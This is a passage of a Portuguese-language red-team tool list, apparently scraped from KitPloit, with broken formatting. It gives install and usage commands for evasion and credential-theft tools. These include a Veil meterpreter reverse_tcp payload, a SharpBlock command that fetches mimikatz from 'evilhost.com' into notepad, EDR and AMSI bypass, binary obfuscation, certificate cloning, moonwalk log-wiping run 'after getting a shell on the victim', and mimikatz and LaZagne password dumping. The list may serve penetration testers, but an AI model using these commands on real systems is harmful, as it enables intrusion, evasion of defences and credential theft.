List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Os criadores do Veil escreveram um ótimo [post no blog](https://www.veil-framework.com/veil-command-line-usage/) explicando mais sobre o uso da linha de comando de ordnance e evasion.

![image](https://assets.kitploit.com/production/public/readmes/147/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

Um método de contornar as DLLs de projeção ativa do EDR ao impedir a execução do ponto de entrada.

**Recursos:**

- Bloqueia a execução do ponto de entrada das DLLs do EDR, o que impede que os hooks do EDR sejam colocados.
- Bypass de AMSI sem patches que é indetectável por scanners que procuram patches de código Amsi.dll em tempo de execução.
- Processo hospedeiro que é substituído por um PE de implante que pode ser carregado a partir do disco, HTTP ou named pipe (Cobalt Strike).
- O processo implantado é ocultado para ajudar a evadir scanners que procuram processos ocos (hollowed).
- Os argumentos da linha de comando são falsificados (spoofed) e implantados após a criação do processo usando um método furtivo de detecção de EDR.
- Bypass de ETW sem patches.
- Bloqueia a invocação de NtProtectVirtualMemory quando o chamador está dentro do intervalo do espaço de endereço de uma DLL bloqueada.

**Instalação:** 

Use o [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) para compilar o binário do SharpBlock.

Abra o [projeto .sln](https://github.com/CCob/SharpBlock) do SharpBlock, escolha "Release" e compile.

**Uso:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

Boa postagem no blog PenTestPartners aqui.

image

Imagem usada de https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatraz é um ofuscador de binários x64 com GUI que é capaz de ofuscar vários arquivos pe diferentes, incluindo:

  • .exe
  • .dll
  • .sys

Alguns recursos de ofuscação suportados incluem:

  • Ofuscação de movimentos imediatos
  • Achatamento de fluxo de controle
  • Mutação ADD
  • Ofuscação de ponto de entrada
  • Ofuscação de Lea

Instalação: (Requisitos)

Instalação: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**Uso:** 

Usando a GUI para ofuscar um binário:

1. Carregue um binário clicando em `file` no canto superior esquerdo.
2. Adicione funções expandindo a árvore `Functions`. (Você pode pesquisar inserindo o nome na barra de pesquisa no topo)
3. Pressione `compile` (**Nota:** *Ofuscar muitas funções pode levar alguns segundos*)

![image](https://assets.kitploit.com/production/public/readmes/147/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

*Imagem usada de https://github.com/weak1337/Alcatraz*

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangle é uma ferramenta que manipula aspectos de executáveis compilados (.exe ou DLL). 

Mangle pode remover strings conhecidas de Indicadores de Compromisso (IoC) e substituí-las por caracteres aleatórios, alterar o arquivo inflando o tamanho para evitar EDRs, e pode clonar certificados de assinatura de código de arquivos legítimos. 

Ao fazer isso, o Mangle ajuda loaders a evadir scanners em disco e em memória.

**Instalação:** 

O primeiro passo, como sempre, é clonar o repositório. Antes de compilar o Mangle, você precisará instalar as dependências. Para instalá-las, execute os seguintes comandos:```
go get github.com/Binject/debug/pe

Em seguida, construa-o``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Uso:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

Informações completas de uso podem ser encontradas aqui.

image

Imagem usada de https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail é um ótimo site que pode ser usado para gerar snippets PowerShell ofuscados que quebram ou desabilitam o AMSI para o processo atual.

Os snippets são selecionados aleatoriamente de um pequeno conjunto de técnicas/variações antes de serem ofuscados. Cada snippet é ofuscado em tempo de execução/solicitação para que nenhuma saída gerada compartilhe as mesmas assinaturas.

Ótimo blog da f-secure explicando AMSI aqui.

image

Imagem usada de http://amsi.fail/

🔙ScareCrow

ScareCrow é um framework de criação de payloads para side loading (não injeção) em um processo legítimo do Windows (contornando controles de Application Whitelisting).

Uma vez que o loader DLL é carregado na memória, ele utiliza uma técnica para remover os hooks de um EDR das DLLs do sistema que estão rodando na memória do processo.

Quando executado, o ScareCrow copiará os bytes das DLLs do sistema armazenadas no disco em C:\Windows\System32\. Essas DLLs são armazenadas no disco “limpas” de hooks de EDR porque são usadas pelo sistema para carregar uma cópia inalterada em um novo processo quando ele é criado. Como os EDRs apenas hookam esses processos na memória, eles permanecem inalterados.

Ótimos blogs para aprender sobre as técnicas utilizadas pelo ScareCrow:

  • Endpoint Detection and Response: How Hackers Have Evolved
  • EDR and Blending In: How Attackers Avoid Getting Caught

Instalação:

ScareCrow requer golang 1.16.1 ou posterior para compilar loaders.```bash

Clone

git clone https://github.com/optiv/ScareCrow cd ScareCrow

Install dependencies

go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo

Required

openssl osslsigncode mingw-w64

Build

go build ScareCrow.go

root@kitploit:~
**Uso:**```
Usage of ./ScareCrow:
  -I string
        Path to the raw 64-bit shellcode.
  -Loader string
        Sets the type of process that will sideload the malicious payload:
        [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
        [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
        [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
        [*] excel - Loads into a hidden Excel process using a JScript loader.
        [*] msiexec - Loads into MSIexec process using a JScript loader.
        [*] wscript - Loads into WScript process using a JScript loader. (default "binary")
  -O string
        Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
  -configfile string
        The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
...

Informações completas de uso podem ser encontradas aqui.

image

Imagem usada de https://github.com/optiv/ScareCrow

🔙moonwalk

moonwalk é um executável de 400 KB em um único binário que pode limpar seus rastros durante testes de penetração em uma máquina Unix.

Ele salva o estado dos logs do sistema antes da exploração e reverte esse estado, incluindo os timestamps do sistema de arquivos após a exploração, deixando zero vestígios de um fantasma na máquina.

Instalação:```bash curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk

root@kitploit:~
**Uso:**```bash
# Start moonwalk straight after getting a shell on the victim Linux endpoint
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
chmod +x moonwalk
moonwalk start

# Once you are finished, clear your traces 
moonwalk finish

image

Imagem usada de https://github.com/mufeedvh/moonwalk

Acesso a Credenciais

🔙Mimikatz

Excelente ferramenta para obter acesso a hashes e senhas em texto claro no endpoint de uma vítima. Depois de obter acesso privilegiado a um sistema, utilize esta ferramenta para coletar algumas credenciais.

Instalação:

  1. Faça o download do arquivo mimikatz_trunk.7z.
  2. Após o download, o binário mimikatz.exe encontra-se na pasta x64.

Uso:```bash .\mimikatz.exe privilege::debug

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/a66e3040f581c95c762704952a34495375ffc7d58ad12074d747869851a40ad6.png)

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)

Ferramente útil para extrair senhas armazenadas localmente de navegadores, bancos de dados, jogos, e-mail, git, wifi, etc.

**Instalação: (Binário)**

Você pode instalar o binário autônomo a partir de [aqui](https://github.com/AlessandroZ/LaZagne/releases/).

**Uso:**```bash
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

🔙hashcat


Read more

Baixar ferramenta
  • skanuvaty Scanner de DNS/rede/portas perigosamente rápido
  • Metabigor Ferramenta OSINT sem API
  • Gitrob Scanner de informações sensíveis no GitHub
  • gowitness Utilitário de captura de tela web usando Chrome Headless